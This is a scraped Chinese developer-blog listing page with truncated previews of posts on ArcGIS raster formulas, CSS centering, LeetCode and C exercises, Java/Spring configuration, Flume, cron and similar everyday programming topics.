    我们在使用ArcGIS时通常经常用到栅格计算器,今天主要给大家介绍我日常中经常用到的几个公式,供大家参考学习。将特定值(-9999)赋值为0,例如-9999.Con("raster"==-9999,0,"raster")2.给空值赋予特定的值(如0)Con(IsNull("raster"),0,"raster")3.将特定的栅格值(如1)赋值为空值,其他保留原值SetNull("raster"==
  • 高级编程--XML+socket练习题 masa010 java开发语言
    1.北京华北2114.8万人上海华东2,500万人广州华南1292.68万人成都华西1417万人(1)使用dom4j将信息存入xml中(2)读取信息,并打印控制台(3)添加一个city节点与子节点(4)使用socketTCP协议编写服务端与客户端,客户端输入城市ID,服务器响应相应城市信息(5)使用socketTCP协议编写服务端与客户端,客户端要求用户输入city对象,服务端接收并使用dom4j
  • 水平垂直居中的几种方法(总结) LJ小番茄 CSS_玄学语言htmljavascript前端csscss3
    1.使用flexbox的justify-content和align-items.parent{display:flex;justify-content:center;/*水平居中*/align-items:center;/*垂直居中*/height:100vh;/*需要指定高度*/}2.使用grid的place-items:center.parent{display:grid;place-item
  • 回溯 Leetcode 332 重新安排行程 mmaerd Leetcode刷题学习记录leetcode算法职场和发展
    重新安排行程Leetcode332学习记录自代码随想录给你一份航线列表tickets,其中tickets[i]=[fromi,toi]表示飞机出发和降落的机场地点。请你对该行程进行重新规划排序。所有这些机票都属于一个从JFK(肯尼迪国际机场)出发的先生,所以该行程必须从JFK开始。如果存在多种有效的行程,请你按字典排序返回最小的行程组合。例如,行程[“JFK”,“LGA”]与[“JFK”,“LGB
  • 每日一题——第八十九题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:在字符串中找到提取数字,并统计一共找到多少整数,a123xxyu23&8889,那么找到的整数为123,23,8889//思想:#include#include#includeintmain(){charstr[]="a123xxyu23&8889";intcount=0;intnum=0;//用于临时存放当前正在构建的整数。boolinNum=false;//用于标记当前是否正在读取一个整
  • 每日一题——第九十题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:判断子串是否与主串匹配#include#include#include//////判断子串是否在主串中匹配//////主串///子串///boolisSubstring(constchar*str,constchar*substr){intlenstr=strlen(str);//计算主串的长度intlenSub=strlen(substr);//计算子串的长度//遍历主字符串,对每个可能得
  • 每日一题——第八十一题 互联网打工人no1 C语言程序设计每日一练c语言
    打印如下图案:#includeintmain(){inti,j;charch='A';for(i=1;i<5;i++,ch++){for(j=0;j<5-i;j++){printf("");//控制空格输出}for(j=1;j<2*i;j++)//条件j<2*i{printf("%c",ch);//控制字符输出}printf("\n");}return0;}
  • 每日一题——第八十四题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:编写函数1、输入10个职工的姓名和职工号2、按照职工由大到小顺序排列,姓名顺序也随之调整3、要求输入一个职工号,用折半查找法找出该职工的姓名#define_CRT_SECURE_NO_WARNINGS#include#include#defineMAX_EMPLOYEES10typedefstruct{intid;charname[50];}Empolyee;voidinputEmploye
  • 每日一题——第八十二题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:将一个控制台输入的字符串中的所有元音字母复制到另一字符串中#include#include#include#include#defineMAX_INPUT1024boolisVowel(charp);intmain(){charinput[MAX_INPUT];charoutput[MAX_INPUT];printf("请输入一串字符串:\n");fgets(input,sizeof(inp
  • 每日一题——第八十三题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:将输入的整形数字输出,输出1990,输出"1990"#include#defineMAX_INPUT1024intmain(){intarrr_num[MAX_INPUT];intnum,i=0;printf("请输入一个数字:");scanf_s("%d",&num);while(num!=0){arrr_num[i++]=num%10;num/=10;}printf("\"");for(
  • C#中使用split分割字符串 互联网打工人no1 c#
    1、用字符串分隔:usingSystem.Text.RegularExpressions;stringstr="aaajsbbbjsccc";string[]sArray=Regex.Split(str,"js",RegexOptions.IgnoreCase);foreach(stringiinsArray)Response.Write(i.ToString()+"");输出结果:aaabbbc
  • WPF中的ComboBox控件几种数据绑定的方式 互联网打工人no1 wpfc#
    一、用字典给ItemsSource赋值(此绑定用的地方很多,建议熟练掌握)在XMAL中:在CS文件中privatevoidBindData(){DictionarydicItem=newDictionary();dicItem.add(1,"北京");dicItem.add(2,"上海");dicItem.add(3,"广州");cmb_list.ItemsSource=dicItem;cmb_l
  • 用MiddleGenIDE工具生成hibernate的POJO(根据数据表生成POJO类) AdyZhang POJOeclipseHibernateMiddleGenIDE
    推荐:MiddlegenIDE插件,   是一个Eclipse   插件.     用它可以直接连接到数据库,   根据表按照一定的HIBERNATE规则作出BEAN和对应的XML ,用完后你可以手动删除它加载的JAR包和XML文件!     今天开始试着使用
  • .9.png Cb123456 android
      “点九”是andriod平台的应用软件开发里的一种特殊的图片形式,文件扩展名为:.9.png   智能手机中有自动横屏的功能,同一幅界面会在随着手机(或平板电脑)中的方向传感器的参数不同而改变显示的方向,在界面改变方向后,界面上的图形会因为长宽的变化而产生拉伸,造成图形的失真变形。   我们都知道android平台有多种不同的分辨率,很多控件的切图文件在被放大拉伸后,边
  • 算法的效率 天子之骄 算法效率复杂度最坏情况运行时间大O阶平均情况运行时间
    算法的效率 效率是速度和空间消耗的度量。集中考虑程序的速度,也称运行时间或执行时间,用复杂度的阶(O)这一标准来衡量。空间的消耗或需求也可以用大O表示,而且它总是小于或等于时间需求。   以下是我的学习笔记:   1.求值与霍纳法则,即为秦九韶公式。   2.测定运行时间的最可靠方法是计数对运行时间有贡献的基本操作的执行次数。运行时间与这个计数成正比。
  • java数据结构 何必如此 java数据结构
    Java 数据结构 Java工具包提供了强大的数据结构。在Java中的数据结构主要包括以下几种接口和类: 枚举(Enumeration) 位集合(BitSet) 向量(Vector) 栈(Stack) 字典(Dictionary) 哈希表(Hashtable) 属性(Properties) 以上这些类是传统遗留的,在Java2中引入了一种新的框架-集合框架(Collect
  • MybatisHelloWorld 3213213333332132
    //测试入口TestMyBatis package com.base.helloworld.test; import java.io.IOException; import org.apache.ibatis.io.Resources; import org.apache.ibatis.session.SqlSession; import org.apache.ibat
  • Java|urlrewrite|URL重写|多个参数 7454103 javaxmlWeb工作
     个人工作经验! 如有不当之处,敬请指点 1.0  web -info 目录下建立     urlrewrite.xml  文件 类似如下: <?xml version="1.0" encoding="UTF-8" ?>   <!DOCTYPE u
  • 达梦数据库+ibatis darkranger sqlmysqlibatisSQL Server
    --插入数据方面 如果您需要数据库自增... 那么在插入的时候不需要指定自增列. 如果想自己指定ID列的值, 那么要设置 set identity_insert  数据库名.模式名.表名; ----然后插入数据; example: create table zhabei.test( id bigint identity(1,1) primary key, nam
  • XML 解析 四种方式 aijuans android
    XML现在已经成为一种通用的数据交换格式,平台的无关性使得很多场合都需要用到XML。本文将详细介绍用Java解析XML的四种方法。 XML现在已经成为一种通用的数据交换格式,它的平台无关性,语言无关性,系统无关性,给数据集成与交互带来了极大的方便。对于XML本身的语法知识与技术细节,需要阅读相关的技术文献,这里面包括的内容有DOM(Document Object
  • spring中配置文件占位符的使用 avords
    1.类 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.o
  • 前端工程化-公共模块的依赖和常用的工作流 bee1314 webpack
    题记: 一个人的项目,还有工程化的问题嘛?   我们在推进模块化和组件化的过程中,肯定会不断的沉淀出我们项目的模块和组件。对于这些沉淀出的模块和组件怎么管理?另外怎么依赖也是个问题? 你真的想这样嘛?   var BreadCrumb = require(‘../../../../uikit/breadcrumb’); //真心ugly。  
  • 上司说「看你每天准时下班就知道你工作量不饱和」,该如何回应? bijian1013 项目管理沟通IT职业规划
    问题:上司说「看你每天准时下班就知道你工作量不饱和」,如何回应         正常下班时间6点,只要是6点半前下班的,上司都认为没有加班。   Eno-Bea回答,注重感受,不一定是别人的         虽然我不知道你具体从事什么工作与职业,但是我大概猜测,你是从事一项不太容易出现阶段性成果的工作
  • TortoiseSVN,过滤文件 征客丶 SVN
    环境: TortoiseSVN 1.8 配置: 在文件夹空白处右键 选择  TortoiseSVN -> Settings 在 Global ignote pattern 中添加要过滤的文件: 多类型用英文空格分开 *name : 过滤所有名称为 name 的文件或文件夹 *.name : 过滤所有后缀为 name 的文件或文件夹 --------
  • 【Flume二】HDFS sink细说 bit1129 Flume
    1. Flume配置   a1.sources=r1 a1.channels=c1 a1.sinks=k1 ###Flume负责启动44444端口 a1.sources.r1.type=avro a1.sources.r1.bind=0.0.0.0 a1.sources.r1.port=44444 a1.sources.r1.chan
  • The Eight Myths of Erlang Performance bookjovi erlang
    erlang有一篇guide很有意思: http://www.erlang.org/doc/efficiency_guide 里面有个The Eight Myths of Erlang Performance: http://www.erlang.org/doc/efficiency_guide/myths.html   Myth: Funs are sl
  • java多线程网络传输文件(非同步)-2008-08-17 ljy325 java多线程socket
    利用 Socket 套接字进行面向连接通信的编程。客户端读取本地文件并发送;服务器接收文件并保存到本地文件系统中。 使用说明:请将TransferClient, TransferServer, TempFile三个类编译,他们的类包是FileServer. 客户端: 修改TransferClient: serPort, serIP, filePath, blockNum,的值来符合您机器的系
  • 读《研磨设计模式》-代码笔记-模板方法模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet;
  • 配置心得 chenyu19891124 配置
    时间就这样不知不觉的走过了一个春夏秋冬,转眼间来公司已经一年了,感觉时间过的很快,时间老人总是这样不停走,从来没停歇过。 作为一名新手的配置管理员,刚开始真的是对配置管理是一点不懂,就只听说咱们公司配置主要是负责升级,而具体该怎么做却一点都不了解。经过老员工的一点点讲解,慢慢的对配置有了初步了解,对自己所在的岗位也慢慢的了解。 做了一年的配置管理给自总结下: 1.改变 从一个以前对配置毫无
  • 对“带条件选择的并行汇聚路由问题”的再思考 comsci 算法工作软件测试嵌入式领域模型
    2008年上半年,我在设计并开发基于”JWFD流程系统“的商业化改进型引擎的时候,由于采用了新的嵌入式公式模块而导致出现“带条件选择的并行汇聚路由问题”(请参考2009-02-27博文),当时对这个问题的解决办法是采用基于拓扑结构的处理思想,对汇聚点的实际前驱分支节点通过算法预测出来,然后进行处理,简单的说就是找到造成这个汇聚模型的分支起点,对这个起始分支节点实际走的路径数进行计算,然后把这个实际
  • Oracle 10g 的clusterware 32位 下载地址 daizj oracle
    Oracle 10g 的clusterware 32位 下载地址 http://pan.baidu.com/share/link?shareid=531580&uk=421021908 http://pan.baidu.com/share/link?shareid=137223&uk=321552738 http://pan.baidu.com/share/l
  • 非常好的介绍:Linux定时执行工具cron dongwei_6688 linux
    Linux经过十多年的发展,很多用户都很了解Linux了,这里介绍一下Linux下cron的理解,和大家讨论讨论。cron是一个Linux 定时执行工具,可以在无需人工干预的情况下运行作业,本文档不讲cron实现原理,主要讲一下Linux定时执行工具cron的具体使用及简单介绍。 新增调度任务推荐使用crontab -e命令添加自定义的任务(编辑的是/var/spool/cron下对应用户的cr
  • Yii assets目录生成及修改 dcj3sjt126com yii
    assets的作用是方便模块化,插件化的,一般来说出于安全原因不允许通过url访问protected下面的文件,但是我们又希望将module单独出来,所以需要使用发布,即将一个目录下的文件复制一份到assets下面方便通过url访问。 assets设置对应的方法位置 \framework\web\CAssetManager.php   assets配置方法 在m
  • mac工作软件推荐 dcj3sjt126com mac
    mac上的Terminal + bash + screen组合现在已经非常好用了,但是还是经不起iterm+zsh+tmux的冲击。在同事的强烈推荐下,趁着升级mac系统的机会,顺便也切换到iterm+zsh+tmux的环境下了。 我为什么要要iterm2 切换过来也是脑袋一热的冲动,我也调查过一些资料,看了下iterm的一些优点: * 兼容性好,远程服务器 vi 什么的低版本能很好兼
  • Memcached(三)、封装Memcached和Ehcache frank1234 memcachedehcachespring ioc
    本文对Ehcache和Memcached进行了简单的封装,这样对于客户端程序无需了解ehcache和memcached的差异,仅需要配置缓存的Provider类就可以在二者之间进行切换,Provider实现类通过Spring IoC注入。 cache.xml <?xml version="1.0" encoding="UTF-8"?>
  • Remove Duplicates from Sorted List II hcx2013 remove
    Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list. For example,Given 1->2->3->3->4->4->5,
  • Spring4新特性——注解、脚本、任务、MVC等其他特性改进 jinnianshilongnian spring4
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • MySQL安装文档 liyong0802 mysql
      工作中用到的MySQL可能安装在两种操作系统中,即Windows系统和Linux系统。以Linux系统中情况居多。   安装在Windows系统时与其它Windows应用程序相同按照安装向导一直下一步就即,这里就不具体介绍,本文档只介绍Linux系统下MySQL的安装步骤。   Linux系统下安装MySQL分为三种:RPM包安装、二进制包安装和源码包安装。二
  • 使用VS2010构建HotSpot工程 p2p2500 HotSpotOpenJDKVS2010
    1. 下载OpenJDK7的源码:      http://download.java.net/openjdk/jdk7      http://download.java.net/openjdk/      2. 环境配置     ▶
  • Oracle实用功能之分组后列合并 seandeng888 oracle分组实用功能合并
    1       实例解析 由于业务需求需要对表中的数据进行分组后进行合并的处理,鉴于Oracle10g没有现成的函数实现该功能,且该功能如若用JAVA代码实现会比较复杂,因此,特将SQL语言的实现方式分享出来,希望对大家有所帮助。如下: 表test 数据如下: ID,SUBJECTCODE,DIMCODE,VALUE 1&nbs
  • Java定时任务注解方式实现 tuoni javaspringjvmxmljni
    Spring 注解的定时任务,有如下两种方式: 第一种: <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"  xmlns:xsi="http
  • 11大Java开源中文分词器的使用方法和分词效果对比 yangshangchuan word分词器ansj分词器Stanford分词器FudanNLP分词器HanLP分词器
    本文的目标有两个: 1、学会使用11大Java开源中文分词器 2、对比分析11大Java开源中文分词器的分词效果 本文给出了11大Java开源中文分词的使用方法以及分词结果对比代码,至于效果哪个好,那要用的人结合自己的应用场景自己来判断。 11大Java开源中文分词器,不同的分词器有不同的用法,定义的接口也不一样,我们先定义一个统一的接口: /** * 获取文本的所有分词结果, 对比
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他